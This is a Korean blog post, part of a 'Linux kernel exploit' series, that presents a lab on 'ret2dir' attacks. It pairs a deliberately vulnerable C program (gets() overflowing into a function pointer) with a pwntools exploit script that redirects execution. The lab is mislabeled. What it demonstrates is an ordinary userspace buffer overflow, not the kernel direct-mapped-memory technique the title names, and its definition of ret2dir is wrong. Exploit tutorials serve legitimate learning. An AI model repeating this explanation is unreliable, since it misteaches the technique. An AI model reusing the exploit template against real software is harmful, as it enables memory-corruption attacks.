strangerRidingCaml

10. Return-to-Direct-Mapped Memory (ret2dir) Attacks 본문

Linux kernel exploit

10. Return-to-Direct-Mapped Memory (ret2dir) Attacks

woddlwoddl 2024. 5. 12. 22:55
728x90
Return-to-Direct-Mapped Memory (ret2dir) Attacks

Return-to-Direct-Mapped Memory (ret2dir) Attacks

Return-to-Direct-Mapped Memory (ret2dir) attacks involve redirecting program execution to a specific location in memory, typically to execute malicious code or escalate privileges.

Lab Activity: Return-to-Direct-Mapped Memory (ret2dir) Attack

In this lab activity, we'll demonstrate a ret2dir attack on a vulnerable C program.

Defender Side Code:


#include <stdio.h>
#include <stdlib.h>

void vulnerable_function(char *name) {
    printf("Hello, %s!\n", name);
}

int main() {
    char name[64];
    void (*func_ptr)() = vulnerable_function;

    printf("Enter your name: ");
    gets(name);  // Vulnerability: gets() doesn't check buffer boundaries

    printf("Nice to meet you, ");
    func_ptr(name);  // Attacker controls the function pointer
    printf("\n");

    return 0;
}

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):

We need to find the address of the target function or shellcode to redirect the program execution.


from pwn import *

# Address of the target function or shellcode
# This address needs to be determined using tools like gdb or pwntools' ELF class
target_addr = 0x004005f7  # Example address, adjust as necessary

# Padding to fill the buffer and overwrite the function pointer
padding = b"A" * 64

# Payload to redirect program execution to the target address
payload = padding + p64(target_addr)

# Establishing connection to the vulnerable program
p = process("./vulnerable_program")

# Sending the payload
p.sendline(payload)

# Interactive shell
p.interactive()

The exploit code constructs a payload with padding to fill the buffer and overwrite the function pointer with the address of the target function or shellcode. Before running the exploit, we need to find the address of the target function using tools like gdb or pwntools' ELF class. Once the address is obtained, we set it in the exploit code. Then, we establish a connection to the vulnerable program, send the payload, and gain control over program execution upon successful exploitation.

'Linux kernel exploit' 카테고리의 다른 글

12. Segregation of Kernel Memory from Userspace Memory  (0) 2024.05.13
11. Kernel Address Space Layout Randomization (KASLR)  (0) 2024.05.13
9. Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct)  (0) 2024.05.12
8. Null Pointer Dereference Exploits  (0) 2024.05.12
7. Write-What-Where (Arbitrary Memory Overwrite)  (0) 2024.05.12
'Linux kernel exploit' Related Articles more